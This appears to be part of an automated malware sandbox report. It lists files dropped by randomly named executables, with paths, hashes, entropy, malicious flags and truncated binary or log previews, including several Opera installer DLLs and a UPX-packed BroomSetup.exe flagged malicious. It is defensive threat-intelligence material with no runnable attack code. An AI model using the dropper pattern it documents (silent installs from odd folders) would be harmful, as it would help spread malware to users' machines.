                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312112813759.log

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (521)
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):3800
                                                                                                                                                                                                                                Entropy (8bit):5.587540829036879
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:ijMux9mZ76eHpvKei+Je1OX5glBX5glbN5Sx:ijMu/D6ea5g/5g1qx
                                                                                                                                                                                                                                MD5:93A7639D5B8C08557A5B2D26D6E77B3C
                                                                                                                                                                                                                                SHA1:9B92AEAE6B21BE4DC2400B8E6205FA74FF215C72
                                                                                                                                                                                                                                SHA-256:6BDF8F63ADAF58B4D603816F5D653118FB2DBB3C8B5700C220078F3E9BD9773E
                                                                                                                                                                                                                                SHA-512:D02E2594CB038936F901E4D9FF5DEBBD94DBAC7E47B9AE3AE08961BD76FBC428EF92AEC896334EAFA669539EA6B8059B3983A7454A879776FA398D64C34113A0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:[0312/112813.759:INFO:installer_main.cc(455)] Opera installer starting - version 108.0.5067.24 Stable.[0312/112813.759:INFO:installer_main.cc(458)] Command line: "C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe" --silent --allusers=0.[0312/112813.759:INFO:installer_main.cc(480)] Uninstall:0.[0312/112813.759:INFO:installer_main.cc(481)] Silent:1.[0312/112813.759:INFO:installer_main.cc(482)] Run Immediately0.[0312/112813.759:INFO:installer_main.cc(484)] Backend0.[0312/112813.759:INFO:installer_main.cc(485)] Inside package0.[0312/112813.759:INFO:installer_main.cc(486)] Autoupdate:0.[0312/112813.759:INFO:payload_manager_impl.cc(97)] Reading Payload.[0312/112813.759:INFO:installer_main.cc(636)] Tracking data: Njg3ZDU4M2VjNTc1MGY3MWY4MmFmNGY2MGI0OWQzMDRlY2RhYzg5MGY3YjA4MjNmN2Y4YTc3OGM2OGRmNmQ5Yjp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\BroomSetup.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1828864
                                                                                                                                                                                                                                Entropy (8bit):7.40381475947401
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:YUnaQiKJ8N+AadA6mICFhNGffVCPi9NUko6jE:ZwKa+u6mICFSwPKDK
                                                                                                                                                                                                                                MD5:EEE5DDCFFBED16222CAC0A1B4E2E466E
                                                                                                                                                                                                                                SHA1:28B40C88B8EA50B0782E2BCBB4CC0F411035F3D5
                                                                                                                                                                                                                                SHA-256:2A40E5DCCC7526C4982334941C90F95374460E2A816E84E724E98C4D52AE8C54
                                                                                                                                                                                                                                SHA-512:8F88901F3EBD425818DB09F268DF19CCF8A755603F04E9481BCF02B112A84393F8A900EAD77F8F971BFA33FD9FA5636B7494AAEE864A0FB04E3273911A4216DC
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...F..^.................P........7.@YN...7..`N...@...........................S..................@....................<.......R.@....`N......................................................[N...............................<.....................UPX0......7.............................UPX1.....P....7..L..................@....rsrc........`N......P..............@..............................................................................................................................................................................................................................................................................................................................................................................4.22.UPX!....

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Opera_installer_2403121027440668612.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4852640
                                                                                                                                                                                                                                Entropy (8bit):6.878125903025885
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:g6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwC:lfKo30lSzTXr4dHUkrPwh/X5zWilPD5N
                                                                                                                                                                                                                                MD5:FDEB4D1D95A738BA8882988A97A12D32
                                                                                                                                                                                                                                SHA1:42DD25CAE583521AA96A02B5135BBA6FDE9AC3FB
                                                                                                                                                                                                                                SHA-256:1C52520C6D2398A266245A1D29FCF5B58FF7BB8F7ECF8868898BAB7BCAD37D6E
                                                                                                                                                                                                                                SHA-512:4CB87510D4612A36C83543CA58A17469AA8AAEE569481C121D2D70A7923D7174EFBDCEDE18342F49BB26AA0BBCD44B58630697EF54986AA5EFBF2B3920EF33CF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e.........."!.....`3..z......@.'.......................................K.....8.J...@A.........................];.m....];.......=..4............I..)....I.p.....;.....................0.;......x3..............h;.4...<\;.`....................text...._3......`3................. ..`.rdata...[...p3..\...d3.............@..@.data.........;..@....;.............@....rodata......p=.......<............. ..`.tls....].....=.......<.............@...CPADinfo0.....=.......<.............@...malloc_h......=.......<............. ..`.rsrc....4....=..6....<.............@..@.reloc..p.....I......>H.............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Opera_installer_2403121027455829404.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4852640
                                                                                                                                                                                                                                Entropy (8bit):6.878125903025885
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:g6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwC:lfKo30lSzTXr4dHUkrPwh/X5zWilPD5N
                                                                                                                                                                                                                                MD5:FDEB4D1D95A738BA8882988A97A12D32
                                                                                                                                                                                                                                SHA1:42DD25CAE583521AA96A02B5135BBA6FDE9AC3FB
                                                                                                                                                                                                                                SHA-256:1C52520C6D2398A266245A1D29FCF5B58FF7BB8F7ECF8868898BAB7BCAD37D6E
                                                                                                                                                                                                                                SHA-512:4CB87510D4612A36C83543CA58A17469AA8AAEE569481C121D2D70A7923D7174EFBDCEDE18342F49BB26AA0BBCD44B58630697EF54986AA5EFBF2B3920EF33CF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e.........."!.....`3..z......@.'.......................................K.....8.J...@A.........................];.m....];.......=..4............I..)....I.p.....;.....................0.;......x3..............h;.4...<\;.`....................text...._3......`3................. ..`.rdata...[...p3..\...d3.............@..@.data.........;..@....;.............@....rodata......p=.......<............. ..`.tls....].....=.......<.............@...CPADinfo0.....=.......<.............@...malloc_h......=.......<............. ..`.rsrc....4....=..6....<.............@..@.reloc..p.....I......>H.............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Opera_installer_2403121027464559972.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4852640
                                                                                                                                                                                                                                Entropy (8bit):6.878125903025885
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:g6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwC:lfKo30lSzTXr4dHUkrPwh/X5zWilPD5N
                                                                                                                                                                                                                                MD5:FDEB4D1D95A738BA8882988A97A12D32
                                                                                                                                                                                                                                SHA1:42DD25CAE583521AA96A02B5135BBA6FDE9AC3FB
                                                                                                                                                                                                                                SHA-256:1C52520C6D2398A266245A1D29FCF5B58FF7BB8F7ECF8868898BAB7BCAD37D6E
                                                                                                                                                                                                                                SHA-512:4CB87510D4612A36C83543CA58A17469AA8AAEE569481C121D2D70A7923D7174EFBDCEDE18342F49BB26AA0BBCD44B58630697EF54986AA5EFBF2B3920EF33CF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e.........."!.....`3..z......@.'.......................................K.....8.J...@A.........................];.m....];.......=..4............I..)....I.p.....;.....................0.;......x3..............h;.4...<\;.`....................text...._3......`3................. ..`.rdata...[...p3..\...d3.............@..@.data.........;..@....;.............@....rodata......p=.......<............. ..`.tls....].....=.......<.............@...CPADinfo0.....=.......<.............@...malloc_h......=.......<............. ..`.rsrc....4....=..6....<.............@..@.reloc..p.....I......>H.............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Opera_installer_24031210274997611284.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\MX6OxFuxXLJNkbD9F2dPLyyC.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4852640
                                                                                                                                                                                                                                Entropy (8bit):6.878125903025885
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:g6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwC:lfKo30lSzTXr4dHUkrPwh/X5zWilPD5N
                                                                                                                                                                                                                                MD5:FDEB4D1D95A738BA8882988A97A12D32
                                                                                                                                                                                                                                SHA1:42DD25CAE583521AA96A02B5135BBA6FDE9AC3FB
                                                                                                                                                                                                                                SHA-256:1C52520C6D2398A266245A1D29FCF5B58FF7BB8F7ECF8868898BAB7BCAD37D6E
                                                                                                                                                                                                                                SHA-512:4CB87510D4612A36C83543CA58A17469AA8AAEE569481C121D2D70A7923D7174EFBDCEDE18342F49BB26AA0BBCD44B58630697EF54986AA5EFBF2B3920EF33CF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e.........."!.....`3..z......@.'.......................................K.....8.J...@A.........................];.m....];.......=..4............I..)....I.p.....;.....................0.;......x3..............h;.4...<\;.`....................text...._3......`3................. ..`.rdata...[...p3..\...d3.............@..@.data.........;..@....;.............@....rodata......p=.......<............. ..`.tls....].....=.......<.............@...CPADinfo0.....=.......<.............@...malloc_h......=.......<............. ..`.rsrc....4....=..6....<.............@..@.reloc..p.....I......>H.............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Opera_installer_24031210275032111804.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4852640
                                                                                                                                                                                                                                Entropy (8bit):6.878125903025885
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:g6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwC:lfKo30lSzTXr4dHUkrPwh/X5zWilPD5N
                                                                                                                                                                                                                                MD5:FDEB4D1D95A738BA8882988A97A12D32
                                                                                                                                                                                                                                SHA1:42DD25CAE583521AA96A02B5135BBA6FDE9AC3FB
                                                                                                                                                                                                                                SHA-256:1C52520C6D2398A266245A1D29FCF5B58FF7BB8F7ECF8868898BAB7BCAD37D6E
                                                                                                                                                                                                                                SHA-512:4CB87510D4612A36C83543CA58A17469AA8AAEE569481C121D2D70A7923D7174EFBDCEDE18342F49BB26AA0BBCD44B58630697EF54986AA5EFBF2B3920EF33CF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e.........."!.....`3..z......@.'.......................................K.....8.J...@A.........................];.m....];.......=..4............I..)....I.p.....;.....................0.;......x3..............h;.4...<\;.`....................text...._3......`3................. ..`.rdata...[...p3..\...d3.............@..@.data.........;..@....;.............@....rodata......p=.......<............. ..`.tls....].....=.......<.............@...CPADinfo0.....=.......<.............@...malloc_h......=.......<............. ..`.rsrc....4....=..6....<.............@..@.reloc..p.....I......>H.............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Opera_installer_24031210275393811096.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4852640
                                                                                                                                                                                                                                Entropy (8bit):6.878125903025885
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:g6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwC:lfKo30lSzTXr4dHUkrPwh/X5zWilPD5N
                                                                                                                                                                                                                                MD5:FDEB4D1D95A738BA8882988A97A12D32
                                                                                                                                                                                                                                SHA1:42DD25CAE583521AA96A02B5135BBA6FDE9AC3FB
                                                                                                                                                                                                                                SHA-256:1C52520C6D2398A266245A1D29FCF5B58FF7BB8F7ECF8868898BAB7BCAD37D6E
                                                                                                                                                                                                                                SHA-512:4CB87510D4612A36C83543CA58A17469AA8AAEE569481C121D2D70A7923D7174EFBDCEDE18342F49BB26AA0BBCD44B58630697EF54986AA5EFBF2B3920EF33CF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e.........."!.....`3..z......@.'.......................................K.....8.J...@A.........................];.m....];.......=..4............I..)....I.p.....;.....................0.;......x3..............h;.4...<\;.`....................text...._3......`3................. ..`.rdata...[...p3..\...d3.............@..@.data.........;..@....;.............@....rodata......p=.......<............. ..`.tls....].....=.......<.............@...CPADinfo0.....=.......<.............@...malloc_h......=.......<............. ..`.rsrc....4....=..6....<.............@..@.reloc..p.....I......>H.............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Opera_installer_24031210280464513384.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4852640
                                                                                                                                                                                                                                Entropy (8bit):6.878125903025885
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:g6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwC:lfKo30lSzTXr4dHUkrPwh/X5zWilPD5N
                                                                                                                                                                                                                                MD5:FDEB4D1D95A738BA8882988A97A12D32
                                                                                                                                                                                                                                SHA1:42DD25CAE583521AA96A02B5135BBA6FDE9AC3FB
                                                                                                                                                                                                                                SHA-256:1C52520C6D2398A266245A1D29FCF5B58FF7BB8F7ECF8868898BAB7BCAD37D6E
                                                                                                                                                                                                                                SHA-512:4CB87510D4612A36C83543CA58A17469AA8AAEE569481C121D2D70A7923D7174EFBDCEDE18342F49BB26AA0BBCD44B58630697EF54986AA5EFBF2B3920EF33CF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e.........."!.....`3..z......@.'.......................................K.....8.J...@A.........................];.m....];.......=..4............I..)....I.p.....;.....................0.;......x3..............h;.4...<\;.`....................text...._3......`3................. ..`.rdata...[...p3..\...d3.............@..@.data.........;..@....;.............@....rodata......p=.......<............. ..`.tls....].....=.......<.............@...CPADinfo0.....=.......<.............@...malloc_h......=.......<............. ..`.rsrc....4....=..6....<.............@..@.reloc..p.....I......>H.............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Opera_installer_24031210280932613620.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4852640
                                                                                                                                                                                                                                Entropy (8bit):6.878125903025885
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:g6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwC:lfKo30lSzTXr4dHUkrPwh/X5zWilPD5N
                                                                                                                                                                                                                                MD5:FDEB4D1D95A738BA8882988A97A12D32
                                                                                                                                                                                                                                SHA1:42DD25CAE583521AA96A02B5135BBA6FDE9AC3FB
                                                                                                                                                                                                                                SHA-256:1C52520C6D2398A266245A1D29FCF5B58FF7BB8F7ECF8868898BAB7BCAD37D6E
                                                                                                                                                                                                                                SHA-512:4CB87510D4612A36C83543CA58A17469AA8AAEE569481C121D2D70A7923D7174EFBDCEDE18342F49BB26AA0BBCD44B58630697EF54986AA5EFBF2B3920EF33CF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e.........."!.....`3..z......@.'.......................................K.....8.J...@A.........................];.m....];.......=..4............I..)....I.p.....;.....................0.;......x3..............h;.4...<\;.`....................text...._3......`3................. ..`.rdata...[...p3..\...d3.............@..@.data.........;..@....;.............@....rodata......p=.......<............. ..`.tls....].....=.......<.............@...CPADinfo0.....=.......<.............@...malloc_h......=.......<............. ..`.rsrc....4....=..6....<.............@..@.reloc..p.....I......>H.............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gs0rzb3n.ygs.psm1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mj5axrew.4sg.psm1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnmyqwhe.2gm.ps1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5kguwrd.iza.ps1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\file.txt

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):500000
                                                                                                                                                                                                                                Entropy (8bit):6.021986548032622
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:8HPIkbNcJ6+M+pP4LRgnU1ICrxUqLsxy06Gm856Xorx9ioQbOF/rPsgTtprZP4FR:cPNcsiFU1bxUyXGHlWbOF/rPsgTX2Xz
                                                                                                                                                                                                                                MD5:932F74E39CA5186F60BC9349C38DDA42
                                                                                                                                                                                                                                SHA1:40540CF3ACC0541FE471259BE690AB3CE36EA13E
                                                                                                                                                                                                                                SHA-256:33F115D30E946FBF55BCAE827EC929F0E3DB56CEC856AC04ED4027DF38F70300
                                                                                                                                                                                                                                SHA-512:D2EB3C07C5F81F30B3CB158675BDA8D5587ADA41BE520C7A32713DC467E2FC421E66EB9316DDB4A43834EC3AD71D5E56F505E4180BB4055883224D5A1BE32395
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa.NdkIBX7R0MXI/fz98B1G7Pj5EkToaaPHCnfPQ01B3yzo5ZQLm0Y6S/bZwQJ+1O3ua2jO3QslgyVX.0sCO32ZP26v5QpkgPMfQ6LYGfvPw/Z3yBcqZFGQYw5cUpLlOshrhokH3lYs/qr6OjQ02dt2FiG4c.j7nkEUF7P0yh1yFbK6aBHgYiliOsBF11EMx+QWETtPXLfm3WuhyrvcvmBVVi45ayu5vhYo3oTsVs.OnkiYR/v2VjJwSdl7Kwrba3P5cdHh7BefANDi2bGIoafnRn98g4YQtRVgpEQbRULAKJNlIkZjdJa.Q5jw67IDhIDvGxIDdsmr3NOfK/1xuB0at4WFtSvfmJbDum3LacnP4SOeajoPR3rYY1pS6Fg63beJ.RT68kEmTT01eX9bR7KlAuZEj+RDHjsH7c6E10J+z/c2WT1JVqt1kQ1vnUuLi4g9s7asdr8YvGbO5.rnXEUPJmT1wPdrwZUqzoVeZcfjwzkxU96Z3n16J4+lDfw9EXNzQL+M9bLjDDbV1DlWDH8Z9BCxwC.I2JS6ZgnO6lW9qQoOJGp846lYKOogT7bQ7/7BXP+SVKAiBEKhDbX4tfJQT7LvybURsdyt8CH60yU.n6Twu9oiay1ghXYuOEDteKMxfnC3CblbhJtfmTzWoMzg2bQvBKh0DncbCHid49SQkuH+dkCB4CC0.Z3g+r0uRLhtnIfRPToXE8fAQCgSIZYX93cP6ycyQfDC3hP2aqiikKrTeG4asHtXPbnk4bk+GLpuH.6zmu6TKxdRN7RrDgptIGObZxEVKJp35t4sSK7s0TKo3EPakM6AmqpbOwbeSlVU7LAkgj2CDX1gJi.l2hmltKpfpQLAz06AhhRGFk28JMl8O91NhI/y/UwYiMU6jqSTP8FmWGOEgSVUAdUa2HFX441kJ4Z

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):706560
                                                                                                                                                                                                                                Entropy (8bit):6.506350582279243
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:yTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+dIq5MRxyF:6PcYn5c/rPx37/zHBA6pFptZ1CEQqMRU
                                                                                                                                                                                                                                MD5:1C1FD0B05187F81F28F910EB5B511E12
                                                                                                                                                                                                                                SHA1:9E9F7B8F19B461704AF327FC4E46DEE77E9C19CC
                                                                                                                                                                                                                                SHA-256:0EB10A29C808BB5783494E1C9A74410EFAC9A687A46E3056F7A783F9461E543F
                                                                                                                                                                                                                                SHA-512:08884CDD2CA4D4689E1886F23343B236907CBD999984B5D7AD18B3FC74D59B08F92A9231C1D412DBF9466CE76B7B11A54DB0CEB14C4292FA33557CF3D2273185
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
